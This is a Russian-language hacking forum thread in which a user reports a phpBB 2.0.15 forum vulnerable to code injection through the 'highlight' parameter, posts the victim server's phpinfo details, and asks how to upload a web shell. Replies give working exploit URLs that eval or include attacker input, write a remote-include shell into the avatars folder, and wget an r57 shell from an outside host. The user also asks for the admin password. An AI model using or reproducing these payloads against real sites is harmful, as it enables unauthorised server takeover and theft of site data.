ДОрогие друзья я нашол форум с дырой
по запросу
http://сайт/forum/viewtopic.php?t=161&cmd=phpinfo();&highlight='.eval($HTTP_GET_VARS[cmd]).'
phpinfo выдал
система System Windows NT SUPPORT 5.0 build 2195
FTP support enabled
PATH_TRANSLATED D:\www\www2\forum\viewtopic.php
SystemRoot C:\WINNT
TEMP C:\WINNT\TEMP
TMP C:\WINNT\TEMP
USERPROFILE C:\Documents and Settings\Default User
windir C:\WINNT

MySQL Support enabled
Active Persistent Links 0
Active Links 1
Client API version 3.23.49


возможно ли залить шелл и если да то как помогите пожалуйста :)

это тебе поможет ;) хттп://exploit.in/forum/index.php?showtopic=5165

А если попробывать такой командой?
http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'

к сожелению команда http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
не работает :(

Ты можешь команды чтоль на сервере исполнять или что?

пробуй сразу
http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

либо для твоего случая можно попробовать в папку с авами закинуть

http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> D:\www\www2\forum\images\avatars\fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

обязательно с символом ^
если что не получится пиши сюда.

Спосибо тебе за ответ! но я всё перепробывал что ты сказал пишет
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

может кто поможет, главное phpinfo работает!
моя icq 997-253

а можно хотябы узнать пароль админа на форум ?

А какая версия форума?

версия форума phpbb 2.0.15

http://сайт/forum/viewtopic.php?t=161&cmd=wget http://pathofshell//r57.txt;&highlight='.eval($HTTP_GET_VARS[cmd]).'


paprobay vot tak ;)